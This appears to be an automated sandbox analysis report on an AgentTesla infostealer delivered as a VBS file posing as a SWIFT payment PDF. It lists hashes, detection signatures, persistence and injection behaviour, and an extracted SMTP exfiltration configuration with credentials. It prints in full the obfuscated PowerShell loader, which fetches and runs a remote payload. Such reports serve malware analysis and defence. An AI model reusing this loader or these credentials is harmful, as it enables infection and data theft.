Analysis
-
max time kernel
145s -
max time network
140s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
30-04-2024 01:36
Static task
static1
Behavioral task
behavioral1
Sample
SWIFT Copy000224042024-pdf.vbs
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
SWIFT Copy000224042024-pdf.vbs
Resource
win10v2004-20240419-en
General
-
Target
SWIFT Copy000224042024-pdf.vbs
-
Size
34KB
-
MD5
ec0b0c5aca480e26979b6d7dda8cbb14
-
SHA1
a98b3addf15724c049e1f2e44a071df9e7b0df21
-
SHA256
d5271109119ab792f4d1adfa7e24979a19fed1b0d13092b78db4114e3e943170
-
SHA512
b1deee49cd2f74b0c1c651414181e563dcdbd8658573380dc1dc419b5b8962df6f0105387eb0718087b4ac6efcc963fba3ca253c82cef10be4f07a38d986b713
-
SSDEEP
384:3E/p5dFHavtyX+hCajcYRn9LH/Y7Yzlgv9gufiQSKBq42:U/pRL+hDjcswPv9gyRSKBq42
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.cash4cars.nz - Port:
587 - Username:
[email protected] - Password:
logs2024! - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Detect packed .NET executables. Mostly AgentTeslaV4. 2 IoCs
Processes:
resource yara_rule behavioral1/memory/2760-63-0x0000000000540000-0x00000000015A2000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral1/memory/2760-65-0x0000000000540000-0x0000000000582000-memory.dmp INDICATOR_EXE_Packed_GEN01 -
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 2 IoCs
Processes:
resource yara_rule behavioral1/memory/2760-63-0x0000000000540000-0x00000000015A2000-memory.dmp INDICATOR_SUSPICIOUS_Binary_References_Browsers behavioral1/memory/2760-65-0x0000000000540000-0x0000000000582000-memory.dmp INDICATOR_SUSPICIOUS_Binary_References_Browsers -
Detects binaries and memory artifacts referencing sandbox DLLs typically observed in sandbox evasion 2 IoCs
Processes:
resource yara_rule behavioral1/memory/2760-63-0x0000000000540000-0x00000000015A2000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SandboxHookingDLL behavioral1/memory/2760-65-0x0000000000540000-0x0000000000582000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SandboxHookingDLL -
Detects executables referencing Windows vault credential objects. Observed in infostealers 2 IoCs
Processes:
resource yara_rule behavioral1/memory/2760-63-0x0000000000540000-0x00000000015A2000-memory.dmp INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID behavioral1/memory/2760-65-0x0000000000540000-0x0000000000582000-memory.dmp INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID -
Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 2 IoCs
Processes:
resource yara_rule behavioral1/memory/2760-63-0x0000000000540000-0x00000000015A2000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store behavioral1/memory/2760-65-0x0000000000540000-0x0000000000582000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store -
Detects executables referencing many email and collaboration clients. Observed in information stealers 2 IoCs
Processes:
resource yara_rule behavioral1/memory/2760-63-0x0000000000540000-0x00000000015A2000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients behavioral1/memory/2760-65-0x0000000000540000-0x0000000000582000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients -
Detects executables referencing many file transfer clients. Observed in information stealers 2 IoCs
Processes:
resource yara_rule behavioral1/memory/2760-63-0x0000000000540000-0x00000000015A2000-memory.dmp INDICATOR_SUSPICIOUS_EXE_Referenfces_File_Transfer_Clients behavioral1/memory/2760-65-0x0000000000540000-0x0000000000582000-memory.dmp INDICATOR_SUSPICIOUS_EXE_Referenfces_File_Transfer_Clients -
Blocklisted process makes network request 3 IoCs
Processes:
WScript.exepowershell.exeflow pid process 3 2924 WScript.exe 7 2612 powershell.exe 9 2612 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
wab.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\newfile = "C:\\Users\\Admin\\AppData\\Roaming\\newfile\\newfile.exe" wab.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 15 ip-api.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid process 2760 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2884 powershell.exe 2760 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2884 set thread context of 2760 2884 powershell.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exewab.exepid process 2612 powershell.exe 2884 powershell.exe 2884 powershell.exe 2760 wab.exe 2760 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2884 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exewab.exedescription pid process Token: SeDebugPrivilege 2612 powershell.exe Token: SeDebugPrivilege 2884 powershell.exe Token: SeDebugPrivilege 2760 wab.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 2924 wrote to memory of 2612 2924 WScript.exe powershell.exe PID 2924 wrote to memory of 2612 2924 WScript.exe powershell.exe PID 2924 wrote to memory of 2612 2924 WScript.exe powershell.exe PID 2612 wrote to memory of 2508 2612 powershell.exe cmd.exe PID 2612 wrote to memory of 2508 2612 powershell.exe cmd.exe PID 2612 wrote to memory of 2508 2612 powershell.exe cmd.exe PID 2612 wrote to memory of 2884 2612 powershell.exe powershell.exe PID 2612 wrote to memory of 2884 2612 powershell.exe powershell.exe PID 2612 wrote to memory of 2884 2612 powershell.exe powershell.exe PID 2612 wrote to memory of 2884 2612 powershell.exe powershell.exe PID 2884 wrote to memory of 780 2884 powershell.exe cmd.exe PID 2884 wrote to memory of 780 2884 powershell.exe cmd.exe PID 2884 wrote to memory of 780 2884 powershell.exe cmd.exe PID 2884 wrote to memory of 780 2884 powershell.exe cmd.exe PID 2884 wrote to memory of 2760 2884 powershell.exe wab.exe PID 2884 wrote to memory of 2760 2884 powershell.exe wab.exe PID 2884 wrote to memory of 2760 2884 powershell.exe wab.exe PID 2884 wrote to memory of 2760 2884 powershell.exe wab.exe PID 2884 wrote to memory of 2760 2884 powershell.exe wab.exe PID 2884 wrote to memory of 2760 2884 powershell.exe wab.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SWIFT Copy000224042024-pdf.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Smid = 1;$Skoningen='S';$Skoningen+='ubstrin';$Skoningen+='g';Function Unarmorial($Neglectful){$Shia=$Neglectful.Length-$Smid;For($Expt124=5; $Expt124 -lt $Shia; $Expt124+=(6)){$Klebrns85+=$Neglectful.$Skoningen.Invoke( $Expt124, $Smid);}$Klebrns85;}function Microthermic($Photomicrogrammes){. ($Nontragic) ($Photomicrogrammes);}$Strikkeri=Unarmorial 'OverbM Ult obystrzU,dstiuddanl.onfel.uffuaPree./Sla e5 Soci.I dsi0Sa.aa Grank(Erst,WGaiasiMisc,n Dds.d Vej oBemadwPist.s.tami QuercNLsepuTA,skr Suble1D ask0bov.n.Oleoy0Acrid;Beton FllesWLit.iiAthlenCeyss6Incon4ddsaa;Miskn VolpexEib i6Multi4Crumb; lex sp.nrPrespvSubli:taget1 diog2 Ka,e1.anta.secon0wabbl)Swoos Rus,GfasereFolkecukasekbehano hvir/Polyt2Brug.0Genfd1Clock0Tioud0Unpar1Diad,0Inter1Rejse SweepFAdvari D.abrIntraeAppref kuldoendosxScrup/Bulbo1 Brod2 Dolc1Tiltm.Pdof 0gran ';$Hypertension=Unarmorial 'SpingUGulphs antieIronir Drys-Bid,eAIsbjegScaleecountn ChantMilch ';$Skrubberier=Unarmorial ' Afgih WalltAbdomt emifpStrafsAnfre:Paede/Coofs/Tids d Et,nr ruteiOverwvHnd.seTo,lh.AmoungAloysoSy,veo ProsgA deflReap,e,oold. SaddcForhaoMedtnmSocia/BrugeuChiroc Omsa?ImpereTagkaxSmykkpLatvio Super empitSerpi=FjerndNaisso.anddwKursvnBiogrlBac aoMa,moaRevandOcto.&FasanichipmdShi t=Rikki1Disci8unaptN Pleji BasooP.litHAnaloT PapibSe,enDSkovmXD.gte0PasswGConchJPaiocRJampay LegedTrigoiFelinNBru eu Kirk6SwatrDUnsusd OmbisNadirR DegecProgrqM.ddeb Sp,gjCornb6 Ga rwBerapJ ko,vtVeder0Be.kf ';$Fiskeriministeren152=Unarmorial 'Gaul.> Sytj ';$Nontragic=Unarmorial 'In skiVeltae misdxS ant ';$Southwester='Kalds';Microthermic (Unarmorial 'efterS IndueUdra tbarti-SlogaCPocksoUdrydnAngletErro eBenevnIrrestChass S apm- CanoP.ockeaSpotlt Fo ehAcidi SkovfTOddfe:deleg\GlgniOStrukfGlggeeSt.atlBlostiis,afa K,ro. U vatContax LogitMiljb Sve,s-SkrivVdk.inaFlaadl TvrduCanale Avne Misea$S oppSEmpo.oRedanu.licktTuli.hNon,cwUn.ereT.iums rojkt.eroeeFolker Til ;Verbo ');Microthermic (Unarmorial 'BilleiPichif flu ,kor(.uckstUnr meHeuchsskatttveget-CoronpFortra GitttBiorhhR.gns MarkaTFestl:Recip\ S umOSlsetf AnskeTimidlSolskiKildeaponde.AnophtLseprxReplatwarmn)La.ia{Facsie PartxSamfuiH rrotScien}sunna;Advar ');$Nationaliteternes = Unarmorial 'TruceeSirbucbrig.h PreioTromb Pol t% Un,kaKarakp osttpStorkdLavsta GlortDeboraFrevl% Fejl\Tell,r isaneSkyrefBrilluAla.ml Hel,gKnsceeS.utk.FrekvBVolkso CricdI ent Opopo&Lynkr& hin Badese dvokcHomoph Vkk o Par Ka.to$O.cur ';Microthermic (Unarmorial 'blksp$DetergAfganlinsu,oFang,bInsu,a Sy,olTurb.:GemmeA Nonog EburgEmpirrTranseLy ozg ExpuaFordjtJaloueKa.orn MulieLascis De usSvire=Looka(Essinc Sl,gmEfte dg,ard Kapre/PersocVal,f Tral.$,rossNTiltvaMikrot ritmiPoudro ontin juveaKon,elMu,chiFree.tvitaleProp,t Subfe,arinrOverhn.afeeeTent,s Aft,)Sene, ');Microthermic (Unarmorial 'Sub.i$Hj pngRokkelHyperoPromebNonc aadiphlBager: FirsTPrem.rCohncy,ompakMos,ubFo valInteng Reore tradr OpmusAflsn1Kamfe1 Unde3 rov=Viceb$ MidsSJeremk BlodrReperu IdrtbUdmajb UdfleSkuddrDrai,ieftereB,tsorStack. EntesNonrepdefe.lAz.toiMell,tWatti(Manu,$ JordFG,resil oplsKlvelkQuareeLi.ssrO.tuniUf.rsmTop,oiRea.inOlympiv,ndlsZapa,tTr.kweslhu rFormue Bl.pn Teks1 Besg5Konst2Depla)Gy,os ');$Skrubberier=$Trykblgers113[0];Microthermic (Unarmorial 'Comel$SynskgA,diclSk mfoPetkibUnderaaffoll Cole:SkifeE h,lppFors,oFeatos S,ncsMnstee,aglsr PrstnS lereTab,lsBr kk=For.eNAssoce .nwowCo,te-Def.nOServibBoss.j.nconeKujoncThatctAnter Min fSUnglayKopulsAmssnt Cystetr nsmIsole.N.ghtNDrueseGeosttSa.sa.Op osW Ti,feSla,ibSaldoCWrongl,getsiEddaeeUdt nnA.tietGyrou ');Microthermic (Unarmorial 'Sands$deregE SystpCo,groHjkoms KagesPl.mmeg nlor Ge anBo tdePsychsramsh. TilrHCoeloeFastgamas,adadlumeSubedr KapisDisqu[.nsam$FarseHArcheyPsychpTwaese G acrMe.amtPogroePsychnLedi,sSpireiNskesoM,ridnp.osc].nobu=Brevs$OpecdS Meact,rnker Rhini RubakMy hok FlokeDumdrr sargiSvben ');$Pryglet=Unarmorial ' Dag.Enondeps,rucoSandbsSyn rsOpalieBasbarBach.nColibeBearns None.CohabD averoUde.lwPostbnStrailStumpoNonetaBohe.dHonorFbeslai Gra.l.xemeeBurre(Reakt$Disp.SM.rgekM nxirRoqueuTrskrbDe egbChic eNaj,dr jathi oltieBal,orslett,L.erb$GeomotpockerA gosiPentrgAffrou Ort.ySlibn)W.irr ';$Pryglet=$Aggregateness[1]+$Pryglet;$triguy=$Aggregateness[0];Microthermic (Unarmorial 'Splej$Inobsg di elTutt,oFilerbSpejdaHailslUnfol:BrnegS Pus aThor.m Afspm omateBrne,n archl.onpeiBrusegSympanGasmaiBjergn Sl tg Ptersoverwg.umanrfriafuVaccinSol qdUdkikl sk,la wimmgJagtheRec.lnOutche Sto.=Trons(linieT pseueLsrefsPhylltUnper-StudeP UdloaHygeitUnblehWhips Immat$Ulykkt.olycr,atali StnkgBehinuUbeskyDy sv)Spgef ');while (!$Sammenligningsgrundlagene) {Microthermic (Unarmorial 'Gamac$Pa.skgAftenl Mi eou,magbSpif a DebalTr.gi:LovhjEDistrxtilt,aTvaermFang,i rain.ygniaUnconbRedvei,heodl BrndiUnivetHe rkyBlufr1Bjffe3Che.k3 anni= in a$ Coadt For rHete uStre.e Kvik ') ;Microthermic $Pryglet;Microthermic (Unarmorial 'GloruSKol etAfmela IndirgammetFik e-E.atsSFiss,lregnfeN ddmeCard,p ooth Spie,4judai ');Microthermic (Unarmorial ' Reva$Dek.mgI,ustlCisteoS,artbRod ka tenclblreh:SkoleS esmeaSlgtsmUnbehmKagese scutnGeopolStab,iSolubgVisnenKendsi virunStintgBimets PlovgProcrr,astouP.lebn ic bdForr.lTermia epoygStyr,eLoaminIntooeInsan=Bespr(druryT lideAmbits DekltPosty-BevisPDir.caCitywtFrisoh Berr Repo$PityitK,adsr,opvii ndig Spgeu ,atayUnhal) Over ') ;Microthermic (Unarmorial 'Schlo$Ensa,g RecolarteroDidynbLinieac,skdlLiqui: varpSAirpaaIllumb,heidlJustee GivenBistesTerra=Aerin$waldegPanc,lP.rgaoS,ttebSammeaStikkl Purp:SkittI.inicn Con c ,emiaCounsnSassatSkedea HalvtsanikoVagt,rM.edeyJakke+Accur+ Wr t%Revea$UoverTDistirstympy Fan kDullsbcradllFoedegSalmieWineyr A.lisUdtmm1kusse1 Adm 3Pyrrh. F.recLysbaoToaaru Yamsnpseudt ides ') ;$Skrubberier=$Trykblgers113[$Sablens];}Microthermic (Unarmorial 'An,ia$B,oclgGrnselFl atoSurgebstik.aba solPseud:G.ldeTGudbeeGotisaIndebkRetsftPrerorAnisesforudsSkattkDefina moonbRere ,utra= Nonf SygejGPushoeGlde tO.igi-LufteCProtooVer.unEkspatTrilleDagpenStrigt Ford ,kov$ Eu,tt dkorunipoiSkftngEmi auSpindyHigh. ');Microthermic (Unarmorial ',igpt$Masseg.upplltvineoEndekbOverpau amol.ocke: yliPConrioNubrentrip.tNo,nui CellfT,afiiEmpatc Bevga.rrevl F.rbiN nmobPoleruArgufsDvrga Dyrkn= stra Teto[ ,ninSManv yParlysBulkstRegule SubgmSchot.afkryC Outso hurtnIndsnv Lb,telobbyr G.antS dom],rkle: grun:krediFM llerp.intoTorntm Ge.bBSiliraForess.otteeSteno6 Tyfu4LutreS.undetMobilrStramiSprngn Alg,gPrete(Storm$entreTMglineCom oaSpermkSkalot ebrdrenheds ,ecosInedukOpklaa Et,bb,ffal) Moun ');Microthermic (Unarmorial 'Forky$Diamog Kr,olHjertoLaterbPalt.a .ggilSubtr:Drou,L MareuUnderdStyrtiGaspecDeparrNoncooJanics.autoiOmhegtSauroyFod.o Belie=Unive Op ar[UnflaSPhellyHjlpes jertfro.teTordimSr,ov.Sem.eTH.ddieStudexSofactSella.souteEParalnCulv cOphjeoMicrodLoudsiNonsyn agblgTrach]Atrer: Armf:Sca.pASkr.eSMowerCM.dleISejesIRa,ke.Burl,GHomoleSlumktbud tSBuildtFribarHomo iA ternTribeg Insc( hyli$ LevePCocruolignin .kratFj,rniAnte fFlagsiEcto.cUpsolaIfrellU meriIriscbEkspluRugbrsLaane)Hou,e ');Microthermic (Unarmorial 'Kav.a$OversgMentilSchiloUda,bb DelaaEmpirl Like:Afst,BBelooePrin,n DagdeYn lin .rakeMiddesAnore=,alci$AutomL.ortouAma,rdFugleilngslcGerm,rconsooGavlts Ka ti peritD ugmyOptim.Slutns R keuKranibDeregs Plent Error Ans iWalkin,dflugTechn(Inspo3Balan1Garra1Angiv6Unapt1Blgef2Caloy,Forst2 Kove7D.riv8Synkr7Basta0 ,yat) Syno ');Microthermic $Benenes;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\refulge.Bod && echo $"3⤵
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Smid = 1;$Skoningen='S';$Skoningen+='ubstrin';$Skoningen+='g';Function Unarmorial($Neglectful){$Shia=$Neglectful.Length-$Smid;For($Expt124=5; $Expt124 -lt $Shia; $Expt124+=(6)){$Klebrns85+=$Neglectful.$Skoningen.Invoke( $Expt124, $Smid);}$Klebrns85;}function Microthermic($Photomicrogrammes){. ($Nontragic) ($Photomicrogrammes);}$Strikkeri=Unarmorial 'OverbM Ult obystrzU,dstiuddanl.onfel.uffuaPree./Sla e5 Soci.I dsi0Sa.aa Grank(Erst,WGaiasiMisc,n Dds.d Vej oBemadwPist.s.tami QuercNLsepuTA,skr Suble1D ask0bov.n.Oleoy0Acrid;Beton FllesWLit.iiAthlenCeyss6Incon4ddsaa;Miskn VolpexEib i6Multi4Crumb; lex sp.nrPrespvSubli:taget1 diog2 Ka,e1.anta.secon0wabbl)Swoos Rus,GfasereFolkecukasekbehano hvir/Polyt2Brug.0Genfd1Clock0Tioud0Unpar1Diad,0Inter1Rejse SweepFAdvari D.abrIntraeAppref kuldoendosxScrup/Bulbo1 Brod2 Dolc1Tiltm.Pdof 0gran ';$Hypertension=Unarmorial 'SpingUGulphs antieIronir Drys-Bid,eAIsbjegScaleecountn ChantMilch ';$Skrubberier=Unarmorial ' Afgih WalltAbdomt emifpStrafsAnfre:Paede/Coofs/Tids d Et,nr ruteiOverwvHnd.seTo,lh.AmoungAloysoSy,veo ProsgA deflReap,e,oold. SaddcForhaoMedtnmSocia/BrugeuChiroc Omsa?ImpereTagkaxSmykkpLatvio Super empitSerpi=FjerndNaisso.anddwKursvnBiogrlBac aoMa,moaRevandOcto.&FasanichipmdShi t=Rikki1Disci8unaptN Pleji BasooP.litHAnaloT PapibSe,enDSkovmXD.gte0PasswGConchJPaiocRJampay LegedTrigoiFelinNBru eu Kirk6SwatrDUnsusd OmbisNadirR DegecProgrqM.ddeb Sp,gjCornb6 Ga rwBerapJ ko,vtVeder0Be.kf ';$Fiskeriministeren152=Unarmorial 'Gaul.> Sytj ';$Nontragic=Unarmorial 'In skiVeltae misdxS ant ';$Southwester='Kalds';Microthermic (Unarmorial 'efterS IndueUdra tbarti-SlogaCPocksoUdrydnAngletErro eBenevnIrrestChass S apm- CanoP.ockeaSpotlt Fo ehAcidi SkovfTOddfe:deleg\GlgniOStrukfGlggeeSt.atlBlostiis,afa K,ro. U vatContax LogitMiljb Sve,s-SkrivVdk.inaFlaadl TvrduCanale Avne Misea$S oppSEmpo.oRedanu.licktTuli.hNon,cwUn.ereT.iums rojkt.eroeeFolker Til ;Verbo ');Microthermic (Unarmorial 'BilleiPichif flu ,kor(.uckstUnr meHeuchsskatttveget-CoronpFortra GitttBiorhhR.gns MarkaTFestl:Recip\ S umOSlsetf AnskeTimidlSolskiKildeaponde.AnophtLseprxReplatwarmn)La.ia{Facsie PartxSamfuiH rrotScien}sunna;Advar ');$Nationaliteternes = Unarmorial 'TruceeSirbucbrig.h PreioTromb Pol t% Un,kaKarakp osttpStorkdLavsta GlortDeboraFrevl% Fejl\Tell,r isaneSkyrefBrilluAla.ml Hel,gKnsceeS.utk.FrekvBVolkso CricdI ent Opopo&Lynkr& hin Badese dvokcHomoph Vkk o Par Ka.to$O.cur ';Microthermic (Unarmorial 'blksp$DetergAfganlinsu,oFang,bInsu,a Sy,olTurb.:GemmeA Nonog EburgEmpirrTranseLy ozg ExpuaFordjtJaloueKa.orn MulieLascis De usSvire=Looka(Essinc Sl,gmEfte dg,ard Kapre/PersocVal,f Tral.$,rossNTiltvaMikrot ritmiPoudro ontin juveaKon,elMu,chiFree.tvitaleProp,t Subfe,arinrOverhn.afeeeTent,s Aft,)Sene, ');Microthermic (Unarmorial 'Sub.i$Hj pngRokkelHyperoPromebNonc aadiphlBager: FirsTPrem.rCohncy,ompakMos,ubFo valInteng Reore tradr OpmusAflsn1Kamfe1 Unde3 rov=Viceb$ MidsSJeremk BlodrReperu IdrtbUdmajb UdfleSkuddrDrai,ieftereB,tsorStack. EntesNonrepdefe.lAz.toiMell,tWatti(Manu,$ JordFG,resil oplsKlvelkQuareeLi.ssrO.tuniUf.rsmTop,oiRea.inOlympiv,ndlsZapa,tTr.kweslhu rFormue Bl.pn Teks1 Besg5Konst2Depla)Gy,os ');$Skrubberier=$Trykblgers113[0];Microthermic (Unarmorial 'Comel$SynskgA,diclSk mfoPetkibUnderaaffoll Cole:SkifeE h,lppFors,oFeatos S,ncsMnstee,aglsr PrstnS lereTab,lsBr kk=For.eNAssoce .nwowCo,te-Def.nOServibBoss.j.nconeKujoncThatctAnter Min fSUnglayKopulsAmssnt Cystetr nsmIsole.N.ghtNDrueseGeosttSa.sa.Op osW Ti,feSla,ibSaldoCWrongl,getsiEddaeeUdt nnA.tietGyrou ');Microthermic (Unarmorial 'Sands$deregE SystpCo,groHjkoms KagesPl.mmeg nlor Ge anBo tdePsychsramsh. TilrHCoeloeFastgamas,adadlumeSubedr KapisDisqu[.nsam$FarseHArcheyPsychpTwaese G acrMe.amtPogroePsychnLedi,sSpireiNskesoM,ridnp.osc].nobu=Brevs$OpecdS Meact,rnker Rhini RubakMy hok FlokeDumdrr sargiSvben ');$Pryglet=Unarmorial ' Dag.Enondeps,rucoSandbsSyn rsOpalieBasbarBach.nColibeBearns None.CohabD averoUde.lwPostbnStrailStumpoNonetaBohe.dHonorFbeslai Gra.l.xemeeBurre(Reakt$Disp.SM.rgekM nxirRoqueuTrskrbDe egbChic eNaj,dr jathi oltieBal,orslett,L.erb$GeomotpockerA gosiPentrgAffrou Ort.ySlibn)W.irr ';$Pryglet=$Aggregateness[1]+$Pryglet;$triguy=$Aggregateness[0];Microthermic (Unarmorial 'Splej$Inobsg di elTutt,oFilerbSpejdaHailslUnfol:BrnegS Pus aThor.m Afspm omateBrne,n archl.onpeiBrusegSympanGasmaiBjergn Sl tg Ptersoverwg.umanrfriafuVaccinSol qdUdkikl sk,la wimmgJagtheRec.lnOutche Sto.=Trons(linieT pseueLsrefsPhylltUnper-StudeP UdloaHygeitUnblehWhips Immat$Ulykkt.olycr,atali StnkgBehinuUbeskyDy sv)Spgef ');while (!$Sammenligningsgrundlagene) {Microthermic (Unarmorial 'Gamac$Pa.skgAftenl Mi eou,magbSpif a DebalTr.gi:LovhjEDistrxtilt,aTvaermFang,i rain.ygniaUnconbRedvei,heodl BrndiUnivetHe rkyBlufr1Bjffe3Che.k3 anni= in a$ Coadt For rHete uStre.e Kvik ') ;Microthermic $Pryglet;Microthermic (Unarmorial 'GloruSKol etAfmela IndirgammetFik e-E.atsSFiss,lregnfeN ddmeCard,p ooth Spie,4judai ');Microthermic (Unarmorial ' Reva$Dek.mgI,ustlCisteoS,artbRod ka tenclblreh:SkoleS esmeaSlgtsmUnbehmKagese scutnGeopolStab,iSolubgVisnenKendsi virunStintgBimets PlovgProcrr,astouP.lebn ic bdForr.lTermia epoygStyr,eLoaminIntooeInsan=Bespr(druryT lideAmbits DekltPosty-BevisPDir.caCitywtFrisoh Berr Repo$PityitK,adsr,opvii ndig Spgeu ,atayUnhal) Over ') ;Microthermic (Unarmorial 'Schlo$Ensa,g RecolarteroDidynbLinieac,skdlLiqui: varpSAirpaaIllumb,heidlJustee GivenBistesTerra=Aerin$waldegPanc,lP.rgaoS,ttebSammeaStikkl Purp:SkittI.inicn Con c ,emiaCounsnSassatSkedea HalvtsanikoVagt,rM.edeyJakke+Accur+ Wr t%Revea$UoverTDistirstympy Fan kDullsbcradllFoedegSalmieWineyr A.lisUdtmm1kusse1 Adm 3Pyrrh. F.recLysbaoToaaru Yamsnpseudt ides ') ;$Skrubberier=$Trykblgers113[$Sablens];}Microthermic (Unarmorial 'An,ia$B,oclgGrnselFl atoSurgebstik.aba solPseud:G.ldeTGudbeeGotisaIndebkRetsftPrerorAnisesforudsSkattkDefina moonbRere ,utra= Nonf SygejGPushoeGlde tO.igi-LufteCProtooVer.unEkspatTrilleDagpenStrigt Ford ,kov$ Eu,tt dkorunipoiSkftngEmi auSpindyHigh. ');Microthermic (Unarmorial ',igpt$Masseg.upplltvineoEndekbOverpau amol.ocke: yliPConrioNubrentrip.tNo,nui CellfT,afiiEmpatc Bevga.rrevl F.rbiN nmobPoleruArgufsDvrga Dyrkn= stra Teto[ ,ninSManv yParlysBulkstRegule SubgmSchot.afkryC Outso hurtnIndsnv Lb,telobbyr G.antS dom],rkle: grun:krediFM llerp.intoTorntm Ge.bBSiliraForess.otteeSteno6 Tyfu4LutreS.undetMobilrStramiSprngn Alg,gPrete(Storm$entreTMglineCom oaSpermkSkalot ebrdrenheds ,ecosInedukOpklaa Et,bb,ffal) Moun ');Microthermic (Unarmorial 'Forky$Diamog Kr,olHjertoLaterbPalt.a .ggilSubtr:Drou,L MareuUnderdStyrtiGaspecDeparrNoncooJanics.autoiOmhegtSauroyFod.o Belie=Unive Op ar[UnflaSPhellyHjlpes jertfro.teTordimSr,ov.Sem.eTH.ddieStudexSofactSella.souteEParalnCulv cOphjeoMicrodLoudsiNonsyn agblgTrach]Atrer: Armf:Sca.pASkr.eSMowerCM.dleISejesIRa,ke.Burl,GHomoleSlumktbud tSBuildtFribarHomo iA ternTribeg Insc( hyli$ LevePCocruolignin .kratFj,rniAnte fFlagsiEcto.cUpsolaIfrellU meriIriscbEkspluRugbrsLaane)Hou,e ');Microthermic (Unarmorial 'Kav.a$OversgMentilSchiloUda,bb DelaaEmpirl Like:Afst,BBelooePrin,n DagdeYn lin .rakeMiddesAnore=,alci$AutomL.ortouAma,rdFugleilngslcGerm,rconsooGavlts Ka ti peritD ugmyOptim.Slutns R keuKranibDeregs Plent Error Ans iWalkin,dflugTechn(Inspo3Balan1Garra1Angiv6Unapt1Blgef2Caloy,Forst2 Kove7D.riv8Synkr7Basta0 ,yat) Syno ');Microthermic $Benenes;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\refulge.Bod && echo $"4⤵
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD52de9088cf1a95a0aaa8fe21df2156c5c
SHA124da9fc01cdffbda6865f590b54fc54e8efec2e8
SHA256ee8e1f98f264004c1ba99f4283694865c9de8e00fd23aa4d36f20a8f17b94a8d
SHA512a03c271f6635deb53917186b00cfa8884d43910019e1ec656f0bfe2b98946715e05915da9a79871de9285e3ef10b0860cada77c042893bfa81f1dfa5402f1578
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E8M8QAECJ2NSW5VQYCC9.tempFilesize
7KB
MD59cd37f3364f055b69b524ce8c8ad8142
SHA1f7b0463d216384f2d1c39f6ca71aa8b09851b596
SHA2567ea3b94c59b2e349c82ab7cd562d4127d74ac80c04b3d4dbc6da701e3a3ee1ac
SHA5125add01628b887c6c92c26eefcbf52ca311324a18231f32f6908c757c22b9a41c7abdc05245cbe2e933df5e161776de40441ebf4f69ab395ab0c0433f38a2df0e
-
